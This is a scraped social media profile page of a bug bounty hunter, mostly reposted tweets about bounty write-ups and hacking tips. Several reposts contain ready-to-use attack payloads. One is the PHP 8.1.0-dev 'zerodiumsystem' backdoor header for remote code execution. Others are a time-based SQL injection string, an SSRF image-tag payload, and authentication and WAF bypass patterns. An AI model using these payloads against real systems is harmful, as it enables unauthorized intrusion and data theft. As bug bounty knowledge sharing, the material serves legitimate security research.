xelcezeri's profile picture. Aramakla bulunmaz lâkin bulanlar arayanlardır.

Samet Yiğit

@xelcezeri

Aramakla bulunmaz lâkin bulanlar arayanlardır.

Bạn có thể thích
Samet Yiğit đã đăng lại

#BugBounty isn’t just about testing for bugs , it’s about testing your limits 💪 You’ll get blocked by firewalls, restrictions, duplicates, or “informative” reports… but you get back up and keep going. I’ve had moments when I thought, “I’m done, I should just give up on…


Bypassing Business Logic via Race Condition: A $500 Bounty Bug by @a13h1_ medium.com/h7w/bypassing-…


How a Newline Injection in Folder Names Broke Access Revocation: 750$ Bug by @a13h1_ medium.com/p/how-a-newlin…


Unauthorized Access to Enterprise Policies Management: $500 BAC Bug by @a13h1_ medium.com/p/unauthorized…


How I Accidentally Became the Company’s Unofficial File Clerk (And Saw Everyone’s Secrets) 📁👀 by Iski medium.com/p/how-i-accide…


$500 Bounty: Unauthorized Folder Creation with Null Name by @a13h1_ medium.com/p/500-bounty-u…


Samet Yiğit đã đăng lại

الحمد لله Tip: If the redirect_uri parameter that follows the usual login or registration process (email and password) is filtered or sanitized, try checking its behavior when logging in through third-party portals. #BugBounty #bugbountytips #InfoSec

AshrafBasyoni4's tweet image. الحمد لله 

Tip: If the redirect_uri parameter that follows the usual login or registration process (email and password) is filtered or sanitized, try checking its behavior when logging in through third-party portals.

#BugBounty 
#bugbountytips 
#InfoSec

Samet Yiğit đã đăng lại

If you find PHP 8.1.0-dev then try RCE & SQLi User-Agentt: zerodiumsleep(5); User-Agentt: zerodiumsystem('id'); Post Credit: @0x0SojalSec #bugbounty #bugbountytips #rce #sqli #bugbounty

viehgroup's tweet image. If you find PHP 8.1.0-dev then try RCE & SQLi
User-Agentt: zerodiumsleep(5);
User-Agentt: zerodiumsystem('id');

Post Credit: @0x0SojalSec 
#bugbounty #bugbountytips #rce #sqli #bugbounty

Samet Yiğit đã đăng lại

Found a SQL Injection vulnerability in api.****************.com/*************/*************Endpoint. Successfully reported it through HackenProof and received a $300 bounty! 💸 Huge thanks to the amazing @HackenProof team! Their platform makes the entire process incredibly smooth

ziko29504803's tweet image. Found a SQL Injection vulnerability in api.****************.com/*************/*************Endpoint. Successfully reported it through HackenProof and received a $300 bounty! 💸 Huge thanks to the amazing @HackenProof team! Their platform makes the entire process incredibly smooth

Samet Yiğit đã đăng lại

PII 1000$ SQL INJECTION 2000$ PII i found DOC like passport in this rang 01-01-{0-10000} 01-02-{0-10000} sql injection 'AND 4564=(SELECT 4564 FROM PG_SLEEP(10)) OR '04586'='4586 Yay, I was awarded a $2500 bounty on check to write-ups t.me/lu3ky_13 #bugbounty


Samet Yiğit đã đăng lại

Huge shoutout to the one I call "the SQLi master", @5hady_ Thanks so much for the help and tips, whatever is in this article is definitely inspired by your ideas, plus a mix of my own research and what I've learned along the way. medium.com/@40sp3l/how-i-…

4osp3l's tweet image. Huge shoutout to the one I call "the SQLi master", @5hady_ 

Thanks so much for the help and tips, whatever is in this article is definitely inspired by your ideas, plus a mix of my own research and what I've learned along the way.

medium.com/@40sp3l/how-i-…

Samet Yiğit đã đăng lại

I kinda love those developers who rely on WAF rules too much. • /res-api/<ID>/status → 200 OK • /res-api/<ID>/qwertyasdf → 404 • /res-api/<ID>/ → 403 Forbidden • /res-api/<ID>/?anyparam → 200 OK

xchopath's tweet image. I kinda love those developers who rely on WAF rules too much.

• /res-api/&amp;lt;ID&amp;gt;/status → 200 OK
• /res-api/&amp;lt;ID&amp;gt;/qwertyasdf → 404
• /res-api/&amp;lt;ID&amp;gt;/ → 403 Forbidden
• /res-api/&amp;lt;ID&amp;gt;/?anyparam → 200 OK

Samet Yiğit đã đăng lại

SSRF in pdf generation! this api endpoint send the pdf generation request: POST /api/v1/convert/markdown/pdf Add this payload: <img src=‘burp collab url’ /> comes 200ok and hit request in burp collaborator. For more join my BugBounty telegram channel👉🏼 t.me/ShellSec


Samet Yiğit đã đăng lại

Yay, I was awarded a $20,000 bounty on @HackerOx01! for a critical bug exposing Secret private conversation files of all users. Severity: Critical For more: tinyurl.com/jelison #TogetherWeHitHarder #hackerone #bugbounty #bugbountytips #bugbountytip #infosec #Hacking

code_13x's tweet image. Yay, I was awarded a $20,000 bounty on @HackerOx01! for a critical bug exposing Secret private conversation files of all users.

Severity: Critical 

For more: tinyurl.com/jelison

#TogetherWeHitHarder #hackerone #bugbounty #bugbountytips #bugbountytip #infosec #Hacking

Samet Yiğit đã đăng lại

1. Recursive fuzzing /envConfig.json 2. Found interesting endpoint through Burp history. #BugBounty #bugbountytips

rahul0x01's tweet image. 1. Recursive fuzzing /envConfig.json
2. Found interesting endpoint through Burp history. 

#BugBounty #bugbountytips

Samet Yiğit đã đăng lại

I submitted 5 critical reports in 2 hours due to 2 bugs. 1- The first mistake is when you add slach at the end it will bypass authentication - /api/x/x --- > 401 Unauthorized - /api/x/x/ -- > 200 Ok (2/1) #bugbounty #hackerone

00xalr's tweet image. I submitted 5 critical reports in 2 hours due to 2 bugs.

1- The first mistake is when you add slach at the end it will bypass authentication

 - /api/x/x --- &amp;gt; 401 Unauthorized
 - /api/x/x/ -- &amp;gt; 200 Ok

(2/1)
#bugbounty #hackerone

Samet Yiğit đã đăng lại

I just published How I discovered ATO through Insecure Email Verification Flow led to medium bounty medium.com/p/how-i-discov… #bugbounty #bugbountytip


United States Xu hướng

Bạn có thể thích

Loading...

Something went wrong.


Something went wrong.